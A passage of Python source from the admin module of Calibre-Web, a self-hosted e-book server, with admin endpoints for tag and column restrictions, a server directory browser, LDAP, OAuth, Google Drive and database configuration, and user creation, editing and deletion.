            ub.session_commit("Changed allowed tags of user {} to {}".format(usr.name, usr.list_allowed_tags()))
        elif 'submit_deny' in element:
            usr.denied_tags = restriction_addition(element, usr.list_denied_tags)
            ub.session_commit("Changed denied tags of user {} to {}".format(usr.name, usr.list_denied_tags()))
    if res_type == 3:  # CustomC per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
        else:
            usr = current_user
        if 'submit_allow' in element:
            usr.allowed_column_value = restriction_addition(element, usr.list_allowed_column_values)
            ub.session_commit("Changed allowed columns of user {} to {}".format(usr.name,
                                                                               usr.list_allowed_column_values()))
        elif 'submit_deny' in element:
            usr.denied_column_value = restriction_addition(element, usr.list_denied_column_values)
            ub.session_commit("Changed denied columns of user {} to {}".format(usr.name,
                                                                              usr.list_denied_column_values()))
    return ""
@admi.route("/ajax/deleterestriction/<int:res_type>", methods=['POST'])
@login_required
@admin_required
def delete_user_0_restriction(res_type):
    """Template-level variant of delete_restriction: user_id 0 targets
    the configuration template rather than a specific user."""
    return delete_restriction(res_type, user_id=0)
@admi.route("/ajax/deleterestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def delete_restriction(res_type, user_id):
    """Delete one allow/deny restriction entry.

    res_type selects the target: 0 = template tags, 1 = template
    custom-column values, 2 = per-user tags, 3 = per-user custom-column
    values.  The posted element id starts with 'a' (allow list) or 'd'
    (deny list).
    """
    element = request.form.to_dict()
    if res_type == 0:  # Tags as template
        if element['id'].startswith('a'):
            config.config_allowed_tags = restriction_deletion(element, config.list_allowed_tags)
            config.save()
        elif element['id'].startswith('d'):
            config.config_denied_tags = restriction_deletion(element, config.list_denied_tags)
            config.save()
    elif res_type == 1:  # CustomC as template
        if element['id'].startswith('a'):
            config.config_allowed_column_value = restriction_deletion(element, config.list_allowed_column_values)
            config.save()
        elif element['id'].startswith('d'):
            config.config_denied_column_value = restriction_deletion(element, config.list_denied_column_values)
            config.save()
    elif res_type == 2:  # Tags per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
        else:
            usr = current_user
        # Bugfix: the commit/log messages below previously embedded the bound
        # method object (missing call parentheses) and, in the deny branch,
        # logged the *allowed* list instead of the denied one.
        if element['id'].startswith('a'):
            usr.allowed_tags = restriction_deletion(element, usr.list_allowed_tags)
            ub.session_commit("Deleted allowed tags of user {}: {}".format(usr.name, usr.list_allowed_tags()))
        elif element['id'].startswith('d'):
            usr.denied_tags = restriction_deletion(element, usr.list_denied_tags)
            ub.session_commit("Deleted denied tags of user {}: {}".format(usr.name, usr.list_denied_tags()))
    elif res_type == 3:  # Columns per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
        else:
            usr = current_user
        if element['id'].startswith('a'):
            usr.allowed_column_value = restriction_deletion(element, usr.list_allowed_column_values)
            ub.session_commit("Deleted allowed columns of user {}: {}".format(usr.name,
                                                                             usr.list_allowed_column_values()))
        elif element['id'].startswith('d'):
            usr.denied_column_value = restriction_deletion(element, usr.list_denied_column_values)
            ub.session_commit("Deleted denied columns of user {}: {}".format(usr.name,
                                                                            usr.list_denied_column_values()))
    return ""
@admi.route("/ajax/listrestriction/<int:res_type>", defaults={"user_id": 0})
@admi.route("/ajax/listrestriction/<int:res_type>/<int:user_id>")
@login_required
@admin_required
def list_restriction(res_type, user_id):
    """Return the allow/deny restriction entries for the given scope as
    JSON rows with ids 'a<index>' (allow) / 'd<index>' (deny).

    res_type: 0 = template tags, 1 = template custom-column values,
    2 = per-user tags, 3 = per-user custom-column values.
    """
    if res_type == 0:  # Tags as template
        restrict = [{'Element': x, 'type':_('Deny'), 'id': 'd'+str(i) }
                    for i,x in enumerate(config.list_denied_tags()) if x != '']
        allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, x in enumerate(config.list_allowed_tags()) if x != '']
        json_dumps = restrict + allow
    elif res_type == 1:  # CustomC as template
        restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
                    for i, x in enumerate(config.list_denied_column_values()) if x != '']
        allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, x in enumerate(config.list_allowed_column_values()) if x != '']
        json_dumps = restrict + allow
    elif res_type == 2:  # Tags per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
        else:
            usr = current_user
        restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
                    for i, x in enumerate(usr.list_denied_tags()) if x != '']
        allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, x in enumerate(usr.list_allowed_tags()) if x != '']
        json_dumps = restrict + allow
    elif res_type == 3:  # CustomC per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
        else:
            usr = current_user
        restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
                    for i, x in enumerate(usr.list_denied_column_values()) if x != '']
        allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, x in enumerate(usr.list_allowed_column_values()) if x != '']
        json_dumps = restrict + allow
    else:
        json_dumps = ""
    js = json.dumps(json_dumps)
    response = make_response(js)
    response.headers["Content-Type"] = "application/json; charset=utf-8"
    return response
@admi.route("/ajax/fullsync", methods=["POST"])
@login_required
def ajax_fullsync():
    """Drop the current user's Kobo sync bookkeeping so the next sync is
    a full one, and report how many entries were removed."""
    removed = ub.session.query(ub.KoboSyncedBooks) \
        .filter(current_user.id == ub.KoboSyncedBooks.user_id).delete()
    message = _("{} sync entries deleted").format(removed)
    ub.session_commit(message)
    payload = json.dumps([{"type": "success", "message": message}])
    return Response(payload, mimetype='application/json')
@admi.route("/ajax/pathchooser/")
@login_required
@admin_required
def ajax_pathchooser():
    # Thin admin-only endpoint around the shared pathchooser() helper below.
    return pathchooser()
def pathchooser():
    """Server-side directory browser backing the path-chooser dialog.

    Lists the directory given by the 'path' query arg (optionally folders
    only, or filtered to a single filename) and returns a JSON payload
    with the entries, the parent directory and any previously chosen file.
    NOTE(review): 'path' comes straight from the request; the endpoint is
    admin-only, but any server directory readable by the process can be
    browsed this way.
    """
    browse_for = "folder"
    folder_only = request.args.get('folder', False) == "true"
    file_filter = request.args.get('filter', "")
    path = os.path.normpath(request.args.get('path', ""))
    if os.path.isfile(path):
        # A file was passed in - remember it and browse its directory
        oldfile = path
        path = os.path.dirname(path)
    else:
        oldfile = ""
    absolute = False
    if os.path.isdir(path):
        # if os.path.isabs(path):
        cwd = os.path.realpath(path)
        absolute = True
        # else:
        #     cwd = os.path.relpath(path)
    else:
        # Nonexistent path -> fall back to the process working directory
        cwd = os.getcwd()
    cwd = os.path.normpath(os.path.realpath(cwd))
    parentdir = os.path.dirname(cwd)
    if not absolute:
        if os.path.realpath(cwd) == os.path.realpath("/"):
            cwd = os.path.relpath(cwd)
        else:
            cwd = os.path.relpath(cwd) + os.path.sep
        parentdir = os.path.relpath(parentdir) + os.path.sep
    if os.path.realpath(cwd) == os.path.realpath("/"):
        # The filesystem root has no parent to offer
        parentdir = ""
    try:
        folders = os.listdir(cwd)
    except Exception:
        # Unreadable directory -> present it as empty
        folders = []
    files = []
    for f in folders:
        try:
            data = {"name": f, "fullpath": os.path.join(cwd, f)}
            data["sort"] = data["fullpath"].lower()
        except Exception:
            continue
        if os.path.isfile(os.path.join(cwd, f)):
            if folder_only:
                continue
            if file_filter != "" and file_filter != f:
                continue
            data["type"] = "file"
            data["size"] = os.path.getsize(os.path.join(cwd, f))
            # Human-readable size: shift 10 bits per unit step (K, M, ...)
            power = 0
            while (data["size"] >> 10) > 0.3:
                power += 1
                data["size"] >>= 10
            units = ("", "K", "M", "G", "T")
            data["size"] = str(data["size"]) + " " + units[power] + "Byte"
        else:
            data["type"] = "dir"
            data["size"] = ""
        files.append(data)
    # Directories first, then files, each alphabetically (case-insensitive)
    files = sorted(files, key=operator.itemgetter("type", "sort"))
    context = {
        "cwd": cwd,
        "files": files,
        "parentdir": parentdir,
        "type": browse_for,
        "oldfile": oldfile,
        "absolute": absolute,
    }
    return json.dumps(context)
def _config_int(to_save, x, func=int):
    # Copy form field *x* from *to_save* into the global config, coerced via
    # *func* (int by default).  Presumably returns truthy when the stored
    # value changed (judging by the "reboot_required |=" call sites) -
    # confirm against config.set_from_dictionary.
    return config.set_from_dictionary(to_save, x, func)
def _config_checkbox(to_save, x):
    # Checkbox form field: present-and-"on" maps to True, missing maps to the
    # False default.
    return config.set_from_dictionary(to_save, x, lambda y: y == "on", False)
def _config_checkbox_int(to_save, x):
    # Checkbox form field stored as integer 1/0 instead of a bool.
    return config.set_from_dictionary(to_save, x, lambda y: 1 if (y == "on") else 0, 0)
def _config_string(to_save, x):
    # String form field, stripped of surrounding whitespace (falsy values are
    # passed through unchanged).
    return config.set_from_dictionary(to_save, x, lambda y: y.strip() if y else y)
def _configuration_gdrive_helper(to_save):
    """Apply Google-Drive-related settings from the posted form.

    Returns an error text (or None) describing why Drive support is
    unavailable; disables config.config_use_google_drive on failure.
    """
    gdrive_error = None
    if to_save.get("config_use_google_drive"):
        gdrive_secrets = {}
        if not os.path.isfile(gdriveutils.SETTINGS_YAML):
            # No settings.yaml yet -> Drive cannot be enabled as-is
            config.config_use_google_drive = False
        if gdrive_support:
            gdrive_error = gdriveutils.get_error_text(gdrive_secrets)
        if "config_use_google_drive" in to_save and not config.config_use_google_drive and not gdrive_error:
            with open(gdriveutils.CLIENT_SECRETS, 'r') as settings:
                gdrive_secrets = json.load(settings)['web']
            if not gdrive_secrets:
                return _configuration_result(_('client_secrets.json Is Not Configured For Web Application'))
            gdriveutils.update_settings(
                gdrive_secrets['client_id'],
                gdrive_secrets['client_secret'],
                gdrive_secrets['redirect_uris'][0]
            )
    # always show google drive settings, but in case of error deny support
    new_gdrive_value = (not gdrive_error) and ("config_use_google_drive" in to_save)
    if config.config_use_google_drive and not new_gdrive_value:
        config.config_google_drive_watch_changes_response = {}
    config.config_use_google_drive = new_gdrive_value
    if _config_string(to_save, "config_google_drive_folder"):
        # Folder changed -> the cached Drive database is stale, remove it
        gdriveutils.deleteDatabaseOnChange()
    return gdrive_error
def _configuration_oauth_helper(to_save):
    """Apply OAuth provider credentials from the posted form.

    A provider is marked active only when both client id and secret are
    set.  Returns True when a credential changed (restart required).
    """
    active_oauths = 0
    reboot_required = False
    for element in oauthblueprints:
        if to_save["config_" + str(element['id']) + "_oauth_client_id"] != element['oauth_client_id'] \
                or to_save["config_" + str(element['id']) + "_oauth_client_secret"] != element['oauth_client_secret']:
            reboot_required = True
            element['oauth_client_id'] = to_save["config_" + str(element['id']) + "_oauth_client_id"]
            element['oauth_client_secret'] = to_save["config_" + str(element['id']) + "_oauth_client_secret"]
        if to_save["config_" + str(element['id']) + "_oauth_client_id"] \
                and to_save["config_" + str(element['id']) + "_oauth_client_secret"]:
            active_oauths += 1
            element["active"] = 1
        else:
            element["active"] = 0
        # Persist the (possibly updated) credentials and active flag
        ub.session.query(ub.OAuthProvider).filter(ub.OAuthProvider.id == element['id']).update(
            {"oauth_client_id": to_save["config_" + str(element['id']) + "_oauth_client_id"],
             "oauth_client_secret": to_save["config_" + str(element['id']) + "_oauth_client_secret"],
             "active": element["active"]})
    return reboot_required
def _configuration_logfile_helper(to_save):
    """Apply logfile-related settings from the posted form.

    Returns a (reboot_required, error_response) tuple; error_response is
    None on success.
    """
    reboot = False
    reboot = reboot | _config_int(to_save, "config_log_level")
    reboot = reboot | _config_string(to_save, "config_logfile")
    if not logger.is_valid_logfile(config.config_logfile):
        error = _configuration_result(_('Logfile Location is not Valid, Please Enter Correct Path'))
        return reboot, error
    reboot = reboot | _config_checkbox_int(to_save, "config_access_log")
    reboot = reboot | _config_string(to_save, "config_access_logfile")
    if not logger.is_valid_logfile(config.config_access_logfile):
        error = _configuration_result(_('Access Logfile Location is not Valid, Please Enter Correct Path'))
        return reboot, error
    return reboot, None
def _configuration_ldap_helper(to_save):
    """Apply and validate LDAP settings from the posted form.

    Returns a (reboot_required, error_response) tuple; error_response is
    None when all settings are valid.
    """
    reboot_required = False
    reboot_required |= _config_string(to_save, "config_ldap_provider_url")
    reboot_required |= _config_int(to_save, "config_ldap_port")
    reboot_required |= _config_int(to_save, "config_ldap_authentication")
    reboot_required |= _config_string(to_save, "config_ldap_dn")
    reboot_required |= _config_string(to_save, "config_ldap_serv_username")
    reboot_required |= _config_string(to_save, "config_ldap_user_object")
    reboot_required |= _config_string(to_save, "config_ldap_group_object_filter")
    reboot_required |= _config_string(to_save, "config_ldap_group_members_field")
    reboot_required |= _config_string(to_save, "config_ldap_member_user_object")
    reboot_required |= _config_checkbox(to_save, "config_ldap_openldap")
    reboot_required |= _config_int(to_save, "config_ldap_encryption")
    reboot_required |= _config_string(to_save, "config_ldap_cacert_path")
    reboot_required |= _config_string(to_save, "config_ldap_cert_path")
    reboot_required |= _config_string(to_save, "config_ldap_key_path")
    _config_string(to_save, "config_ldap_group_name")
    if to_save.get("config_ldap_serv_password", "") != "":
        # Password only updated when a non-empty value is posted (stored b64)
        reboot_required |= 1
        config.set_from_dictionary(to_save, "config_ldap_serv_password", base64.b64encode, encode='UTF-8')
    config.save()
    # Mandatory fields for any LDAP setup
    if not config.config_ldap_provider_url \
            or not config.config_ldap_port \
            or not config.config_ldap_dn \
            or not config.config_ldap_user_object:
        return reboot_required, _configuration_result(_('Please Enter a LDAP Provider, '
                                                        'Port, DN and User Object Identifier'))
    if config.config_ldap_authentication > constants.LDAP_AUTH_ANONYMOUS:
        if config.config_ldap_authentication > constants.LDAP_AUTH_UNAUTHENTICATE:
            if not config.config_ldap_serv_username or not bool(config.config_ldap_serv_password):
                return reboot_required, _configuration_result(_('Please Enter a LDAP Service Account and Password'))
        else:
            if not config.config_ldap_serv_username:
                return reboot_required, _configuration_result(_('Please Enter a LDAP Service Account'))
    # Filters must contain exactly one %s placeholder and balanced parentheses
    if config.config_ldap_group_object_filter:
        if config.config_ldap_group_object_filter.count("%s") != 1:
            return reboot_required, \
                   _configuration_result(_('LDAP Group Object Filter Needs to Have One "%s" Format Identifier'))
        if config.config_ldap_group_object_filter.count("(") != config.config_ldap_group_object_filter.count(")"):
            return reboot_required, _configuration_result(_('LDAP Group Object Filter Has Unmatched Parenthesis'))
    if config.config_ldap_user_object.count("%s") != 1:
        return reboot_required, \
               _configuration_result(_('LDAP User Object Filter needs to Have One "%s" Format Identifier'))
    if config.config_ldap_user_object.count("(") != config.config_ldap_user_object.count(")"):
        return reboot_required, _configuration_result(_('LDAP User Object Filter Has Unmatched Parenthesis'))
    if to_save.get("ldap_import_user_filter") == '0':
        config.config_ldap_member_user_object = ""
    else:
        if config.config_ldap_member_user_object.count("%s") != 1:
            return reboot_required, \
                   _configuration_result(_('LDAP Member User Filter needs to Have One "%s" Format Identifier'))
        if config.config_ldap_member_user_object.count("(") != config.config_ldap_member_user_object.count(")"):
            return reboot_required, _configuration_result(_('LDAP Member User Filter Has Unmatched Parenthesis'))
    if config.config_ldap_cacert_path or config.config_ldap_cert_path or config.config_ldap_key_path:
        # TLS material is all-or-nothing: every configured path must exist
        if not (os.path.isfile(config.config_ldap_cacert_path) and
                os.path.isfile(config.config_ldap_cert_path) and
                os.path.isfile(config.config_ldap_key_path)):
            return reboot_required, \
                   _configuration_result(_('LDAP CACertificate, Certificate or Key Location is not Valid, '
                                           'Please Enter Correct Path'))
    return reboot_required, None
@admi.route("/ajax/simulatedbchange", methods=['POST'])
@login_required
@admin_required
def simulatedbchange():
    """Dry-run a Calibre DB location change: report whether the location
    would change and whether the target database is valid."""
    change, valid = _db_simulate_change()
    payload = json.dumps({"change": change, "valid": valid})
    return Response(payload, mimetype='application/json')
def _db_simulate_change():
    """Compute, without applying, whether the posted Calibre dir differs
    from the configured one and whether it holds a valid metadata.db.

    Returns (db_change, db_valid); db_change is falsy when no previous
    directory was configured.
    """
    posted = request.form.to_dict()['config_calibre_dir']
    # Users sometimes paste the full path to metadata.db - strip the filename
    new_dir = re.sub(r'[\\/]metadata\.db$', '', posted, flags=re.IGNORECASE).strip()
    db_change = config.config_calibre_dir != new_dir and config.config_calibre_dir
    db_valid = calibre_db.check_valid_db(new_dir, ub.app_DB_path)
    return db_change, db_valid
def _db_configuration_update_helper():
    """Apply a posted Calibre-library location change (plus Google Drive
    settings), wiping per-book user state when the library actually
    changes.  Returns the rendered DB-configuration result page."""
    db_change = False
    to_save = request.form.to_dict()
    gdrive_error = None
    # Users sometimes paste the full path to metadata.db - strip the filename
    to_save['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
                                           '',
                                           to_save['config_calibre_dir'],
                                           flags=re.IGNORECASE)
    try:
        db_change, db_valid = _db_simulate_change()
        # gdrive_error drive setup
        gdrive_error = _configuration_gdrive_helper(to_save)
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        log.error("Settings DB is not Writeable")
        # Bugfix: the result page was computed but not returned, so execution
        # fell through and hit the unset 'db_valid' variable below (NameError).
        return _db_configuration_result(_("Settings DB is not Writeable"), gdrive_error)
    try:
        metadata_db = os.path.join(to_save['config_calibre_dir'], "metadata.db")
        if config.config_use_google_drive and is_gdrive_ready() and not os.path.exists(metadata_db):
            gdriveutils.downloadFile(None, "metadata.db", metadata_db)
            db_change = True
    except Exception as ex:
        return _db_configuration_result('{}'.format(ex), gdrive_error)
    if db_change or not db_valid or not config.db_configured:
        if not calibre_db.setup_db(to_save['config_calibre_dir'], ub.app_DB_path):
            return _db_configuration_result(_('DB Location is not Valid, Please Enter Correct Path'),
                                            gdrive_error)
        # if db changed -> delete shelfs, delete download books, delete read books, kobo sync...
        ub.session.query(ub.Downloads).delete()
        ub.session.query(ub.ArchivedBook).delete()
        ub.session.query(ub.ReadBook).delete()
        ub.session.query(ub.BookShelf).delete()
        ub.session.query(ub.Bookmark).delete()
        ub.session.query(ub.KoboReadingState).delete()
        ub.session.query(ub.KoboStatistics).delete()
        ub.session.query(ub.KoboSyncedBooks).delete()
        ub.session_commit()
    _config_string(to_save, "config_calibre_dir")
    calibre_db.update_config(config)
    if not os.access(os.path.join(config.config_calibre_dir, "metadata.db"), os.W_OK):
        flash(_(u"DB is not Writeable"), category="warning")
    config.save()
    return _db_configuration_result(None, gdrive_error)
def _configuration_update_helper():
    """Validate and persist the basic-configuration form posted by an admin.

    Each ``_config_*`` helper copies one form field into the global ``config``
    object and reports whether the change requires a server restart; the
    accumulated ``reboot_required`` flag triggers a web-server stop at the
    end so the wrapper process can restart with the new settings.

    Returns the JSON response produced by ``_configuration_result``.
    """
    reboot_required = False
    to_save = request.form.to_dict()
    try:
        reboot_required |= _config_int(to_save, "config_port")
        reboot_required |= _config_string(to_save, "config_trustedhosts")
        reboot_required |= _config_string(to_save, "config_keyfile")
        if config.config_keyfile and not os.path.isfile(config.config_keyfile):
            return _configuration_result(_('Keyfile Location is not Valid, Please Enter Correct Path'))

        reboot_required |= _config_string(to_save, "config_certfile")
        if config.config_certfile and not os.path.isfile(config.config_certfile):
            return _configuration_result(_('Certfile Location is not Valid, Please Enter Correct Path'))

        _config_checkbox_int(to_save, "config_uploading")
        _config_checkbox_int(to_save, "config_unicode_filename")
        # Reboot on config_anonbrowse with enabled ldap, as decoraters are changed in this case
        reboot_required |= (_config_checkbox_int(to_save, "config_anonbrowse")
                            and config.config_login_type == constants.LOGIN_LDAP)
        _config_checkbox_int(to_save, "config_public_reg")
        _config_checkbox_int(to_save, "config_register_email")
        reboot_required |= _config_checkbox_int(to_save, "config_kobo_sync")
        _config_int(to_save, "config_external_port")
        _config_checkbox_int(to_save, "config_kobo_proxy")

        if "config_upload_formats" in to_save:
            # Normalize the comma-separated extension list (trim, lowercase,
            # de-duplicate) before storing it.
            to_save["config_upload_formats"] = ','.join(
                helper.uniq([x.lstrip().rstrip().lower() for x in to_save["config_upload_formats"].split(',')]))
            _config_string(to_save, "config_upload_formats")
            constants.EXTENSIONS_UPLOAD = config.config_upload_formats.split(',')

        _config_string(to_save, "config_calibre")
        _config_string(to_save, "config_converterpath")
        _config_string(to_save, "config_kepubifypath")

        reboot_required |= _config_int(to_save, "config_login_type")

        # LDAP configurator
        if config.config_login_type == constants.LOGIN_LDAP:
            reboot, message = _configuration_ldap_helper(to_save)
            if message:
                return message
            reboot_required |= reboot

        # Remote login configuration
        _config_checkbox(to_save, "config_remote_login")
        if not config.config_remote_login:
            # Disabling remote login invalidates all outstanding login tokens.
            ub.session.query(ub.RemoteAuthToken).filter(ub.RemoteAuthToken.token_type == 0).delete()

        # Goodreads configuration
        _config_checkbox(to_save, "config_use_goodreads")
        _config_string(to_save, "config_goodreads_api_key")
        _config_string(to_save, "config_goodreads_api_secret")
        if services.goodreads_support:
            services.goodreads_support.connect(config.config_goodreads_api_key,
                                               config.config_goodreads_api_secret,
                                               config.config_use_goodreads)

        _config_int(to_save, "config_updatechannel")

        # Reverse proxy login configuration
        _config_checkbox(to_save, "config_allow_reverse_proxy_header_login")
        _config_string(to_save, "config_reverse_proxy_login_header_name")

        # OAuth configuration
        if config.config_login_type == constants.LOGIN_OAUTH:
            reboot_required |= _configuration_oauth_helper(to_save)

        reboot, message = _configuration_logfile_helper(to_save)
        if message:
            return message
        reboot_required |= reboot

        # Rarfile Content configuration
        _config_string(to_save, "config_rarfile_location")
        if "config_rarfile_location" in to_save:
            unrar_status = helper.check_unrar(config.config_rarfile_location)
            if unrar_status:
                return _configuration_result(unrar_status)
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        log.error("Settings DB is not Writeable")
        # Fix: previously the error result was built but not returned, so the
        # code fell through to config.save() despite the failed transaction.
        return _configuration_result(_("Settings DB is not Writeable"))

    config.save()
    if reboot_required:
        # Stop the server so the supervising process restarts it with the
        # new (reboot-requiring) settings.
        web_server.stop(True)

    return _configuration_result(None, reboot_required)
def _configuration_result(error_flash=None, reboot=False):
    """Build the JSON response for the configuration AJAX endpoints.

    On error the in-memory config is reloaded (discarding the rejected
    change) and a "danger" message is returned; otherwise a generic success
    message. The payload also carries the reboot flag and the current upload
    format list.
    """
    if error_flash:
        log.error(error_flash)
        # Revert to the last persisted settings.
        config.load()
        messages = [{'type': "danger", 'message': error_flash}]
    else:
        messages = [{'type': "success", 'message': _(u"Calibre-Web configuration updated")}]
    payload = {
        'result': messages,
        'reboot': reboot,
        'config_upload': config.config_upload_formats,
    }
    return Response(json.dumps(payload), mimetype='application/json')
def _db_configuration_result(error_flash=None, gdrive_error=None):
    """Render the database-configuration page, flashing any error state.

    Args:
        error_flash: optional translated error text; when set, the in-memory
            config is reloaded (discarding the failed change) and the text is
            flashed to the user.
        gdrive_error: optional Google Drive error passed in by the caller;
            when absent it is re-checked here if Drive is enabled.
    """
    gdrive_authenticate = not is_gdrive_ready()
    gdrivefolders = []
    if not gdrive_error and config.config_use_google_drive:
        gdrive_error = gdriveutils.get_error_text()
    if gdrive_error and gdrive_support:
        log.error(gdrive_error)
        gdrive_error = _(gdrive_error)
        flash(gdrive_error, category="error")
    else:
        # Only list Drive root folders once authentication succeeded.
        if not gdrive_authenticate and gdrive_support:
            gdrivefolders = gdriveutils.listRootFolders()
    if error_flash:
        # Reload so the form shows the last known-good settings.
        log.error(error_flash)
        config.load()
        flash(error_flash, category="error")
    elif request.method == "POST" and not gdrive_error:
        flash(_("Database Settings updated"), category="success")
    return render_title_template("config_db.html",
                                 config=config,
                                 show_authenticate_google_drive=gdrive_authenticate,
                                 gdriveError=gdrive_error,
                                 gdrivefolders=gdrivefolders,
                                 feature_support=feature_support,
                                 title=_(u"Database Configuration"), page="dbconfig")
def _handle_new_user(to_save, content, languages, translations, kobo_support):
    """Create a new user account from the posted form dict *to_save*.

    Populates *content* (a fresh ``ub.User``), validates the mandatory fields
    (name, e-mail, password), and commits the row. On validation failure the
    edit form is re-rendered with the error; on success the caller is
    redirected to the admin page. DB-level errors are flashed and the
    function falls through (returns None).
    """
    content.default_language = to_save["default_language"]
    content.locale = to_save.get("locale", content.locale)
    # Sidebar visibility is encoded as a bitmask; each checked "show_<n>"
    # checkbox contributes its numeric suffix.
    content.sidebar_view = sum(int(key[5:]) for key in to_save if key.startswith('show_'))
    if "show_detail_random" in to_save:
        content.sidebar_view |= constants.DETAIL_RANDOM
    content.role = constants.selected_roles(to_save)
    content.password = generate_password_hash(to_save["password"])
    try:
        if not to_save["name"] or not to_save["email"] or not to_save["password"]:
            log.info("Missing entries on new user")
            raise Exception(_(u"Please fill out all fields!"))
        content.email = check_email(to_save["email"])
        # Query User name, if not existing, change
        content.name = check_username(to_save["name"])
        if to_save.get("kindle_mail"):
            content.kindle_mail = valid_email(to_save["kindle_mail"])
        if config.config_public_reg and not check_valid_domain(content.email):
            log.info("E-mail: {} for new user is not from valid domain".format(content.email))
            raise Exception(_(u"E-mail is not from valid domain"))
    except Exception as ex:
        flash(str(ex), category="error")
        return render_title_template("user_edit.html", new_user=1, content=content,
                                     config=config,
                                     translations=translations,
                                     languages=languages, title=_(u"Add new user"), page="newuser",
                                     kobo_support=kobo_support, registered_oauth=oauth_check)
    try:
        # New users inherit the globally configured tag/column restrictions.
        content.allowed_tags = config.config_allowed_tags
        content.denied_tags = config.config_denied_tags
        content.allowed_column_value = config.config_allowed_column_value
        content.denied_column_value = config.config_denied_column_value
        # No default value for kobo sync shelf setting
        content.kobo_only_shelves_sync = to_save.get("kobo_only_shelves_sync", 0) == "on"
        ub.session.add(content)
        ub.session.commit()
        flash(_(u"User '%(user)s' created", user=content.name), category="success")
        log.debug("User {} created".format(content.name))
        return redirect(url_for('admin.admin'))
    except IntegrityError:
        ub.session.rollback()
        log.error("Found an existing account for {} or {}".format(content.name, content.email))
        flash(_("Found an existing account for this e-mail address or name."), category="error")
    except OperationalError:
        ub.session.rollback()
        log.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
def _delete_user(content):
    """Delete user *content* together with all dependent rows.

    Refuses to remove the last remaining admin account and the special
    "Guest" account; both cases raise with a translated message. Returns the
    translated success message on deletion.
    """
    other_admins = ub.session.query(ub.User).filter(
        ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
        ub.User.id != content.id).count()
    if not other_admins:
        log.warning(u"No admin user remaining, can't delete user")
        raise Exception(_(u"No admin user remaining, can't delete user"))
    if content.name == "Guest":
        log.warning(_(u"Can't delete Guest User"))
        raise Exception(_(u"Can't delete Guest User"))
    # Remove everything owned by the user: read status, download history,
    # shelf contents, shelves, and finally the user row itself.
    ub.session.query(ub.ReadBook).filter(content.id == ub.ReadBook.user_id).delete()
    ub.session.query(ub.Downloads).filter(content.id == ub.Downloads.user_id).delete()
    for shelf in ub.session.query(ub.Shelf).filter(content.id == ub.Shelf.user_id):
        ub.session.query(ub.BookShelf).filter(shelf.id == ub.BookShelf.shelf).delete()
    ub.session.query(ub.Shelf).filter(content.id == ub.Shelf.user_id).delete()
    ub.session.query(ub.User).filter(ub.User.id == content.id).delete()
    ub.session_commit()
    log.info(u"User {} deleted".format(content.name))
    return (_(u"User '%(nick)s' deleted", nick=content.name))
def _handle_edit_user(to_save, content, languages, translations, kobo_support):
    """Apply the posted edit-user form *to_save* to the existing user *content*.

    Handles deletion, role/sidebar bitmask updates, Kobo shelf-sync state
    transitions and identity changes (name, e-mail, kindle address). Returns
    a redirect/rendered response on delete or validation error, otherwise an
    empty string after committing (so the caller falls through to its own
    rendering).
    """
    if to_save.get("delete"):
        try:
            flash(_delete_user(content), category="success")
        except Exception as ex:
            log.error(ex)
            flash(str(ex), category="error")
        return redirect(url_for('admin.admin'))
    else:
        # Refuse to strip the admin role when this is the only admin left.
        if not ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
                                                ub.User.id != content.id).count() and 'admin_role' not in to_save:
            log.warning("No admin user remaining, can't remove admin role from {}".format(content.name))
            flash(_("No admin user remaining, can't remove admin role"), category="error")
            return redirect(url_for('admin.admin'))
        if to_save.get("password"):
            content.password = generate_password_hash(to_save["password"])
        anonymous = content.is_anonymous
        content.role = constants.selected_roles(to_save)
        # The anonymous flag is not part of the form; preserve it explicitly.
        if anonymous:
            content.role |= constants.ROLE_ANONYMOUS
        else:
            content.role &= ~constants.ROLE_ANONYMOUS
        # Sidebar visibility: sync the bitmask with the checked "show_<n>" boxes.
        val = [int(k[5:]) for k in to_save if k.startswith('show_')]
        sidebar = get_sidebar_config()
        for element in sidebar:
            value = element['visibility']
            if value in val and not content.check_visibility(value):
                content.sidebar_view |= value
            elif value not in val and content.check_visibility(value):
                content.sidebar_view &= ~value
        if to_save.get("Show_detail_random"):
            content.sidebar_view |= constants.DETAIL_RANDOM
        else:
            content.sidebar_view &= ~constants.DETAIL_RANDOM
        old_state = content.kobo_only_shelves_sync
        content.kobo_only_shelves_sync = int(to_save.get("kobo_only_shelves_sync") == "on") or 0
        # 1 -> 0: nothing has to be done
        # 0 -> 1: all synced books have to be added to archived books, + currently synced shelfs
        # which don't have to be synced have to be removed (added to Shelf archive)
        if old_state == 0 and content.kobo_only_shelves_sync == 1:
            kobo_sync_status.update_on_sync_shelfs(content.id)
        if to_save.get("default_language"):
            content.default_language = to_save["default_language"]
        if to_save.get("locale"):
            content.locale = to_save["locale"]
        try:
            if to_save.get("email", content.email) != content.email:
                content.email = check_email(to_save["email"])
            # Query User name, if not existing, change
            if to_save.get("name", content.name) != content.name:
                if to_save.get("name") == "Guest":
                    raise Exception(_("Guest Name can't be changed"))
                content.name = check_username(to_save["name"])
            if to_save.get("kindle_mail") != content.kindle_mail:
                content.kindle_mail = valid_email(to_save["kindle_mail"]) if to_save["kindle_mail"] else ""
